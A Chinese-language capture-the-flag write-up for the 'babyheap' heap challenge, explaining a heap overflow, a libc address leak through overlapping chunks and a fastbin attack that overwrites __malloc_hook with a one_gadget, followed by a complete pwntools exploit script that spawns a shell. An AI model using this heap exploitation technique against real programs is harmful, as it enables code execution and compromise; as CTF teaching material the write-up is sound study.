這道題分配內存空間是用calloc釋放之後會清空分配的內容
edit函數存在堆溢出我們由打贏函數指針數組存在satck地址隨機,我們先想到的fastbin attack寫onegadget但是要先有libc基址也是先是information
leak然後contorl pc我們就可以
先分配4個
add(0x10) #0
add(0x10) #1
add(0x80) #2
add(0x10) #3
修改第二個chunk的size爲0x30,然後包含了第三個chunk的fd和bk,僞造一個chunk到第三個chunk的數據內,然後釋放釋放第二個chunk,然後再次申請同樣的chunk,之後釋放第三個chunk得到libc地址打印第二個chunk即可得到libc地址,然後再次申請一個fastbin大小的chunk修改其fd,即可任意地址寫入(注意要將堆塊復原因爲calloc)
exp:
#!/usr/bin/python2
#coding=utf-8
#name:doudou
from pwn import *
local=1
if local==1:
p=process('../binary/0babyheap')
elf=ELF('../binary/0babyheap')
libc=elf.libc
else:
p=remote('node3.buuoj.cn',25561)
elf=ELF('../binary/0babyheap')
libc=elf.libc
onegadget=[0x45216,0x4526a,0xf02a4,0xf1147]
def add(size):
p.sendlineafter('Command: ','1')
p.sendlineafter('Size: ',str(size))
def edit(idx,size,content):
p.sendlineafter('Command: ','2')
p.sendlineafter('Index: ',str(idx))
p.sendlineafter('Size: ',str(size))
p.sendlineafter('Content: ',content)
def delete(idx):
p.sendlineafter('Command: ','3')
p.sendlineafter('Index: ',str(idx))
def show(idx):
p.sendlineafter('Command: ','4')
p.sendlineafter('Index: ',str(idx))
def exp():
add(0x10) #0
add(0x10) #1
add(0x80) #2
add(0x10) #3
payload='\x00'*0x18+p64(0x41)
edit(0,len(payload),payload)
pd='\x00'*0x18+p64(0x71)
edit(2,len(pd),pd)
delete(1)
add(0x30) #1
edit(1,0x20,'\x00'*0x18+p64(0x91)) #calloc
delete(2)
#edit(1,0x20,'a'*0x20)
show(1)
libcbase=u64(p.recvuntil('\x7f')[-6:].ljust(8,'\x00'))-88-0x10-libc.sym['__malloc_hook']
log.success('libcbase: '+hex(libcbase))
malloc_hook=libcbase+libc.sym['__malloc_hook']
one_gadget=libcbase+onegadget[1]
log.success('One_gadge: '+hex(one_gadget))
add(0x60)#3
delete(2)
pd2='a'*0x18+p64(0x71)+p64(malloc_hook-0x23)
edit(1,len(pd2),pd2)
add(0x60) #3
add(0x60) #4
payload='a'*19+p64(one_gadget)
edit(4,len(payload),payload)
show(1)
p.interactive()
if __name__=="__main__":
exp()